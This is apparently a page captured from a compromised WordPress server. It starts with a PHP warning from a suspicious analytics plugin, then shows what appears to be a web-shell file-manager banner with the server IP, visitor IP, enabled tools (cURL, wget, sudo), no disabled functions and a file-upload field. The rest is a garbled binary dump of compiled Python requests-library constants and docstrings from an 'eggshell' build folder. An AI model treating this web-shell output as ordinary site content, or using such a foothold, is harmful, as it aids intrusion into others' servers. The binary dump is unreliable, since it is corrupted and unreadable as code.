Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
�� �Mapping�.�� �to_key_val_list�.��
�update�.�� �items�.��* �&too many values to unpack (expected 2)�.��� ��Determines appropriate setting for a given request, taking into account
the explicit setting on that request, and the setting in the session. If a
setting is a dictionary, they will be merged together using `dict_class`
�.�� �get�.�� �response���.�� �
session_hooks�.�� �
merge_setting�.�� �
request_hooks�.��� ��Properly merges both requests and session hooks.
This is necessary because when request_hooks == {'response': []}, the
merge breaks Session hooks entirely.
�.�� �is_redirect�.�� �headers�.�� �location�.��
�is_py3�.��
�encode�.�� �latin1���.�� �to_native_string�.�� �utf8�.��; �7Receives a Response. Returns a redirect URI or ``None``�.�� �urlparse�.�� �hostname�.��
�scheme�.�� �http�.�� �port�.�� KPN��.�� �https�.�� M�N��.�� �
DEFAULT_PORTS�.��J �FDecide whether Authorization header should be removed when redirecting�.��F �BReceives a Response. Returns a generator of Responses or Requests.�.�� �self�.�� �get_redirect_target�.�� �resp�.�� �req�.�� �url�.�� �fragment�.�� �copy�.�� �hist�.��
�append�.�� �builtins��slice���KNN��R�.�� �history�.�� �content�.�� �ChunkedEncodingError�.�� �ContentDecodingError�.�� �raw�.�� �read�.�� ���.�� �decode_content���.�� �
max_redirects�.�� �TooManyRedirects�.�� �Exceeded %s redirects.�.�� �close�.�� �
startswith�.�� �//���.�� �%s:%s�.�� � �.�� �previous_fragment�.�� �_replace�.�� h'��.��
�parsed�.��
�geturl�.��
�netloc�.�� �urljoin�.�� �requote_uri�.�� �rebuild_method�.�� �status_code�.�� �codes�.�� �temporary_redirect�.�� �permanent_redirect�.��7 �Content-Length��Content-Type��Transfer-Encoding���.�� �prepared_request�.�� �pop�.�� �body�.��
�Cookie�.�� �extract_cookies_to_jar�.�� �_cookies�.�� �
merge_cookies�.�� �cookies�.�� �prepare_cookies�.�� �rebuild_proxies�.�� �proxies�.�� �rebuild_auth�.�� �_body_position�.�� �Content-Length�.�� �Transfer-Encoding�.�� �rewind_body�.�� �yield_requests�.�� �send�.��
�stream�.�� �timeout�.��
�verify�.�� �cert�.�� �allow_redirects�.�� �adapter_kwargs�.�� �resolve_redirects�.��* �&SessionRedirectMixin.resolve_redirects�.�� �
Authorization�.�� �should_strip_auth�.�� �request�.��
� trust_env�.�� �get_netrc_auth�.�� �prepare_auth�.��� ��When being redirected we may want to strip authentication from the
request to avoid leaking credentials. This method intelligently removes
and reapplies authentication where possible to avoid credential loss.
�.�� �no_proxy���.�� �should_bypass_proxies�.�� �get_environ_proxies�.�� �all���.�� �
setdefault�.�� �Proxy-Authorization�.�� �get_auth_from_url�.�� �new_proxies�.�� NN��.�� �_basic_auth_str�.��� X� This method re-evaluates the proxy configuration by considering the
environment variables. If we are redirected to a URL covered by
NO_PROXY, we strip the proxy configuration. Otherwise, we set missing
proxy keys for this URL (in case they were stripped by a previous
redirect).
This method also replaces the Proxy-Authorization header where
necessary.
:rtype: dict
�.��
�method�.��
� see_other�.�� �HEAD�.�� �GET�.�� �found�.�� �moved�.�� �POST�.��� ��When being redirected we may want to change the method of the request
based on certain specs or browser behavior.
�.�� �default_headers�.�� �auth�.�� �
default_hooks�.�� �hooks�.��
�params�.�� �DEFAULT_REDIRECT_LIMIT�.�� �cookiejar_from_dict�.�� �OrderedDict�.�� �adapters�.�� �mount�.�� �https://�.�� �HTTPAdapter�.�� �http://�.��
� cookielib�.��
� CookieJar�.�� �RequestsCookieJar�.�� �PreparedRequest�.�� �prepare�.�� �upper�.�� �files�.�� �data�.�� �json�.�� �CaseInsensitiveDict�.�� �
dict_class���.�� �merge_hooks�.�� (h�h&h�h�h�hh�h�hZh�t�.��� X� Constructs a :class:`PreparedRequest <PreparedRequest>` for
transmission and returns it. The :class:`PreparedRequest` has settings
merged from the :class:`Request <Request>` instance and those of the
:class:`Session`.
:param request: :class:`Request` instance to prepare with this
session's settings.
:rtype: requests.PreparedRequest
�.�� �Request�.�� (h�h&hh�h�h�h�h�hZh�t�.�� �prepare_request�.�� �merge_environment_settings�.�� X Constructs a :class:`Request <Request>`, prepares it and sends it.
Returns :class:`Response <Response>` object.
:param method: method for the new :class:`Request` object.
:param url: URL for the new :class:`Request` object.
:param params: (optional) Dictionary or bytes to be sent in the query
string for the :class:`Request`.
:param data: (optional) Dictionary, list of tuples, bytes, or file-like
object to send in the body of the :class:`Request`.
:param json: (optional) json to send in the body of the
:class:`Request`.
:param headers: (optional) Dictionary of HTTP Headers to send with the
:class:`Request`.
:param cookies: (optional) Dict or CookieJar object to send with the
:class:`Request`.
:param files: (optional) Dictionary of ``'filename': file-like-objects``
for multipart encoding upload.
:param auth: (optional) Auth tuple or callable to enable
Basic/Digest/Custom HTTP Auth.
:param timeout: (optional) How long to wait for the server to send
data before giving up, as a float, or a :ref:`(connect timeout,
read timeout) <timeouts>` tuple.
:type timeout: float or tuple
:param allow_redirects: (optional) Set to True by default.
:type allow_redirects: bool
:param proxies: (optional) Dictionary mapping protocol or protocol and
hostname to the URL of the proxy.
:param stream: (optional) whether to immediately download the response
content. Defaults to ``False``.
:param verify: (optional) Either a boolean, in which case it controls whether we verify
the server's TLS certificate, or a string, in which case it must be a path
to a CA bundle to use. Defaults to ``True``.
:param cert: (optional) if String, path to ssl client cert file (.pem).
If Tuple, ('cert', 'key') pair.
:rtype: requests.Response
�.��� ��Sends a GET request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
:rtype: requests.Response
�.�� �OPTIONS�.��� ��Sends a OPTIONS request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
:rtype: requests.Response
�.��� ��Sends a HEAD request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
:rtype: requests.Response
�.��� X� Sends a POST request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, list of tuples, bytes, or file-like
object to send in the body of the :class:`Request`.
:param json: (optional) json to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
:rtype: requests.Response
�.�� �PUT�.��| Xu Sends a PUT request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, list of tuples, bytes, or file-like
object to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
:rtype: requests.Response
�.�� �PATCH�.��~ Xw Sends a PATCH request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param data: (optional) Dictionary, list of tuples, bytes, or file-like
object to send in the body of the :class:`Request`.
:param \*\*kwargs: Optional arguments that ``request`` takes.
:rtype: requests.Response
�.��
�DELETE�.��� ��Sends a DELETE request. Returns :class:`Response` object.
:param url: URL for the new :class:`Request` object.
:param \*\*kwargs: Optional arguments that ``request`` takes.
:rtype: requests.Response
�.��'